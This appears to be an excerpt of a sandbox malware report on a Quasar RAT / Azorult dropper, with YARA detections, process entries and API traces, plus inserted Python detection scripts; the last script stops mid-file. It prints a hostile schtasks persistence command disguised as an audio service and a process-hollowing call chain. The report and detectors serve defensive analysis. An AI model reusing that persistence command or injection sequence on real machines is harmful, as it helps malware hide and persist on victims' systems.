                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:01:36:04
                                        Start date:29/09/2021
                                        Path:C:\Users\user\AppData\Local\Temp\windef.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\windef.exe'
                                        Imagebase:0xf10000
                                        File size:357376 bytes
                                        MD5 hash:B4A202E03D4135484D0E730173ABCC72
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 86%, Virustotal, Browse
                                        • Detection: 93%, ReversingLabs
                                        Reputation:moderate

                                        General

                                        Start time:01:36:05
                                        Start date:29/09/2021
                                        Path:C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        Imagebase:0xdb0000
                                        File size:2111264 bytes
                                        MD5 hash:B0B78DA613422BE0DE8DE2E2A2D0CE68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:01:36:06
                                        Start date:29/09/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
                                        Imagebase:0x2d0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
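The process entries above carry three artifacts a detection engineer would write rules against: an svchost.exe started with a bare -k and no service group, a schtasks.exe /create that re-runs a binary from a user-profile path every minute with /F, and that binary carrying the name of a Windows tool (SystemPropertiesPerformance.exe) outside System32. The following is an added example and not part of the Joe Sandbox report: it applies those three checks to constructed process-creation records (Sysmon Event ID 1 style fields) that mirror the command lines shown in this report. The parent images, the benign control record and the WINDOWS_BINARIES list are assumptions; the report section does not state parent processes, and a real rule set would carry a full inventory of Windows binary names.

```python
import re

# Constructed process-creation records modelled on the command lines in this
# report. Parent images are assumed (the report section does not state them).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\user\AppData\Local\Temp\vnc.exe",
     "cmdline": r"'C:\Users\user\AppData\Local\Temp\vnc.exe'",
     "parent": r"C:\Users\user\Desktop\CVbJSUXraQ.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\system32\svchost.exe -k",
     "parent": r"C:\Users\user\AppData\Local\Temp\vnc.exe"},
    {"image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 "
                r"/tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F",
     "parent": r"C:\Users\user\Desktop\CVbJSUXraQ.exe"},
    {"image": r"C:\Users\user\btpanui\SystemPropertiesPerformance.exe",
     "cmdline": r"C:\Users\user\btpanui\SystemPropertiesPerformance.exe",
     "parent": r"C:\Windows\System32\svchost.exe"},   # launched by the Schedule service (assumed)
    # Benign control (constructed): a normal service host started by the SCM.
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
     "parent": r"C:\Windows\System32\services.exe"},
]

# Windows command lines: quoted or bare tokens (Joe Sandbox renders quotes as ').
TOKEN_RE = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")
USER_PROFILE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Names of Windows binaries that appear in this report (assumption: a real
# rule would use a complete inventory of System32 file names).
WINDOWS_BINARIES = {"svchost.exe", "conhost.exe", "schtasks.exe",
                    "systempropertiesperformance.exe"}


def tokens(cmdline):
    return [t.strip("'\"") for t in TOKEN_RE.findall(cmdline)]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path):
    return path.rsplit("\\", 1)[0].lower() + "\\"


def check_schtasks(ev):
    """Flag schtasks /create with a tight repeating trigger on a user-profile target."""
    if basename(ev["image"]) != "schtasks.exe":
        return []
    toks = tokens(ev["cmdline"])
    low = [t.lower() for t in toks]
    if "/create" not in low:
        return []

    def opt(name):  # value following a /switch, or "" if absent
        i = low.index(name) + 1 if name in low else len(toks)
        return toks[i] if i < len(toks) else ""

    out = []
    target = opt("/tr")
    if USER_PROFILE_RE.match(target):
        out.append(f"scheduled task runs a binary from a user profile: {target}")
    if opt("/sc").lower() == "minute" and opt("/mo").isdigit() and int(opt("/mo")) <= 5:
        out.append(f"task re-runs every {opt('/mo')} minute(s)")
    if "/f" in low:
        out.append("/F silently overwrites an existing task with the same name")
    return out


def check_svchost(ev):
    """A service host started by the SCM carries '-k <group>' and has services.exe as parent."""
    if basename(ev["image"]) != "svchost.exe":
        return []
    toks = [t.lower() for t in tokens(ev["cmdline"])]
    out = []
    k = toks.index("-k") + 1 if "-k" in toks else len(toks)
    if k >= len(toks) or toks[k].startswith("-"):
        out.append("svchost without a service group argument (-k <group>)")
    if basename(ev["parent"]) != "services.exe":   # tune with any local exceptions
        out.append(f"svchost parent is {basename(ev['parent'])}, not services.exe")
    return out


def check_masquerade(ev):
    """A Windows binary name running from outside System32/SysWOW64."""
    name = basename(ev["image"])
    if name in WINDOWS_BINARIES and not dirname(ev["image"]).startswith(SYSTEM_DIRS):
        return [f"{name} running from non-system directory {dirname(ev['image'])}"]
    return []


def triage(events):
    """Return {event index: [findings]} for every record that trips a rule."""
    findings = {}
    for i, ev in enumerate(events):
        hits = check_schtasks(ev) + check_svchost(ev) + check_masquerade(ev)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, basename(SAMPLE_EVENTS[idx]["image"]))
        for h in hits:
            print("   -", h)
```

Against the constructed records the rules fire on the bare "-k" svchost (two findings), the schtasks command line (three findings) and the copied SystemPropertiesPerformance.exe under C:\Users (one finding), while the first dropper launch and the benign netsvcs control stay quiet. The per-minute trigger check and the parent check are the ones most worth tuning on real telemetry: legitimate software rarely schedules itself every minute, but some environments do have svchost instances with non-standard parents.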

                                        General

                                        Start time:01:36:07
                                        Start date:29/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:01:36:08
                                        Start date:29/09/2021
                                        Path:C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                                        Imagebase:0xa40000
                                        File size:2111272 bytes
                                        MD5 hash:9423821A023FB02427783F6385871B3B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Azorult_1, Description: Azorult Payload, Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Avira
                                        Reputation:low

                                        Disassembly

                                        Code Analysis

                                          Executed Functions

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DB3B68
                                          • IsDebuggerPresent.KERNEL32 ref: 00DB3B7A
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E752F8,00E752E0,?,?), ref: 00DB3BEB
                                            • Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06
                                            • Part of subcall function 00DC092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DB3C14,00E752F8,?,?,?), ref: 00DC096E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DB3C6F
                                          • MessageBoxA.USER32 ref: 00DED281
                                          • SetCurrentDirectoryW.KERNEL32(?,00E752F8,?,?,?), ref: 00DED2B9
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E64260,00E752F8,?,?,?), ref: 00DED33F
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00DED346
                                            • Part of subcall function 00DB3A46: GetSysColorBrush.USER32(0000000F), ref: 00DB3A50
                                            • Part of subcall function 00DB3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00DB3A5F
                                            • Part of subcall function 00DB3A46: LoadIconW.USER32(00000063), ref: 00DB3A76
                                            • Part of subcall function 00DB3A46: LoadIconW.USER32(000000A4), ref: 00DB3A88
                                            • Part of subcall function 00DB3A46: LoadIconW.USER32(000000A2), ref: 00DB3A9A
                                            • Part of subcall function 00DB3A46: LoadImageW.USER32 ref: 00DB3AC0
                                            • Part of subcall function 00DB3A46: RegisterClassExW.USER32 ref: 00DB3B16
                                            • Part of subcall function 00DB39D5: CreateWindowExW.USER32 ref: 00DB3A03
                                            • Part of subcall function 00DB39D5: CreateWindowExW.USER32 ref: 00DB3A24
                                            • Part of subcall function 00DB39D5: ShowWindow.USER32(00000000), ref: 00DB3A38
                                            • Part of subcall function 00DB39D5: ShowWindow.USER32(00000000), ref: 00DB3A41
                                            • Part of subcall function 00DB434A: _memset.LIBCMT ref: 00DB4370
                                            • Part of subcall function 00DB434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DB4415
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas$%
                                          • API String ID: 529118366-3343222573
                                          • Opcode ID: 65c767f46e6be678c46e3243f89a69f0680dd9d1fd59df803b81150856fe5ceb
                                          • Instruction ID: 2719d68b500ad6c7cae71ee3d84bcae323d8668fa6967fa3e7835234ba5aeddc
                                          • Opcode Fuzzy Hash: 65c767f46e6be678c46e3243f89a69f0680dd9d1fd59df803b81150856fe5ceb
                                          • Instruction Fuzzy Hash: 6E51E331D08289EEDB01EBB6DC0AEED7F75EB45740B144069F456B21B2CAB09649DB31
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 037F02E7
                                          • GetThreadContext.KERNEL32(?,00010007), ref: 037F02FC
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 037F031C
                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 037F034A
                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 037F0367
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000), ref: 037F049B
                                          • VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 037F04B5
                                          • VirtualProtectEx.KERNEL32(?,?,?,00000001,?), ref: 037F051C
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 037F053E
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 037F055D
                                          • SetThreadContext.KERNEL32(?,00010007), ref: 037F057E
                                          • ResumeThread.KERNEL32(?), ref: 037F058C
                                          Memory Dump Source
                                          • Source File: 00000001.00000003.689660388.00000000037F0000.00000040.00000001.sdmp, Offset: 037F0000, based on PE: false
                                          Similarity
                                          • API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
                                          • String ID:
                                          • API String ID: 12256240-0
                                          • Opcode ID: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                          • Instruction ID: 7e4e6159c73cdfc6dc4f26da4ec4d9fb84ab68340e76a726c54e739fa7020137
                                          • Opcode Fuzzy Hash: f12a0e3ec3a1dc5db5e035ccf4192a676492458e181c44b55a32febd4ba72111
                                          • Instruction Fuzzy Hash: 0BF126B5D00219AFDB21CFA5C844BAEFBB9FF48300F1844A9EA55A7351D770AA94CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%
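
The API sequence listed above is the standard RunPE / process-hollowing skeleton, and Joe Sandbox attributes it to a region it marks as not backed by a PE image (based on PE: false), i.e. code the AutoIt host process runs from memory it allocated itself. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it parses the listing exactly as printed above (copied inline as constructed input), names the numeric flag arguments against the documented Win32 prototypes, and flags the CreateProcess(CREATE_SUSPENDED) -> GetThreadContext -> WriteProcessMemory -> SetThreadContext -> ResumeThread chain. It assumes 32-bit prototypes and x86 CONTEXT flag values. Because the page prints "?" for the address arguments, the 4-byte ReadProcessMemory/WriteProcessMemory pair is consistent with fetching and patching the child's PEB image base, but the report itself does not confirm that.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the API list of the report's second executed-function entry
# (module 037F0000) copied as printed; "?" marks arguments the sandbox left unresolved.
TRACE = """\
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 037F02E7
GetThreadContext.KERNEL32(?,00010007), ref: 037F02FC
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 037F031C
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 037F034A
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 037F0367
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000), ref: 037F049B
VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 037F04B5
VirtualProtectEx.KERNEL32(?,?,?,00000001,?), ref: 037F051C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 037F053E
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 037F055D
SetThreadContext.KERNEL32(?,00010007), ref: 037F057E
ResumeThread.KERNEL32(?), ref: 037F058C
"""

CALL_RE = re.compile(r"^(\w+)\.(\w+)\((.*?)\)(?:, ref: ([0-9A-Fa-f]+))?$")

CREATE_SUSPENDED = 0x4  # winbase.h; MEM_*/PAGE_* below are from winnt.h
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

@dataclass
class Call:
    name: str
    args: List[Optional[int]]  # None where the page shows "?" or a string literal
    ref: Optional[str]

def _arg(text: str) -> Optional[int]:
    try:
        return int(text, 16)
    except ValueError:
        return None  # "?" or a string argument such as "runas"

def parse_trace(text: str) -> List[Call]:
    """Parse Joe Sandbox style 'Api.MODULE(args), ref: ADDR' lines (bullets tolerated)."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line.strip().lstrip("•").strip())
        if m:
            name, _module, argstr, ref = m.groups()
            calls.append(Call(name, [_arg(a.strip()) for a in argstr.split(",")] if argstr else [], ref))
    return calls

def bits(value: int, table: dict) -> str:
    """Decode an OR-combined flag word; unknown bits are kept as hex."""
    names = [n for b, n in table.items() if value & b]
    rest = value & ~sum(table)
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def decode_context(v: int) -> str:
    # x86: CONTEXT_i386 (0x10000) | CONTROL (1) | INTEGER (2) | SEGMENTS (4) == CONTEXT_FULL
    return "CONTEXT_FULL (x86)" if v == 0x10007 else hex(v)

mem = lambda v: bits(v, MEM_FLAGS)
prot = lambda v: PAGE_PROT.get(v, hex(v))
# (argument index, parameter name, decoder); indices follow the documented Win32 prototypes.
ARG_DECODERS = {
    "CreateProcessW":     [(5, "dwCreationFlags", lambda v: bits(v, {CREATE_SUSPENDED: "CREATE_SUSPENDED"}))],
    "GetThreadContext":   [(1, "ContextFlags", decode_context)],
    "SetThreadContext":   [(1, "ContextFlags", decode_context)],
    "VirtualAlloc":       [(2, "flAllocationType", mem), (3, "flProtect", prot)],
    "VirtualAllocEx":     [(3, "flAllocationType", mem), (4, "flProtect", prot)],
    "VirtualProtectEx":   [(3, "flNewProtect", prot)],
    "VirtualFree":        [(2, "dwFreeType", mem)],
    "ReadProcessMemory":  [(3, "nSize", str)],
    "WriteProcessMemory": [(3, "nSize", str)],
}

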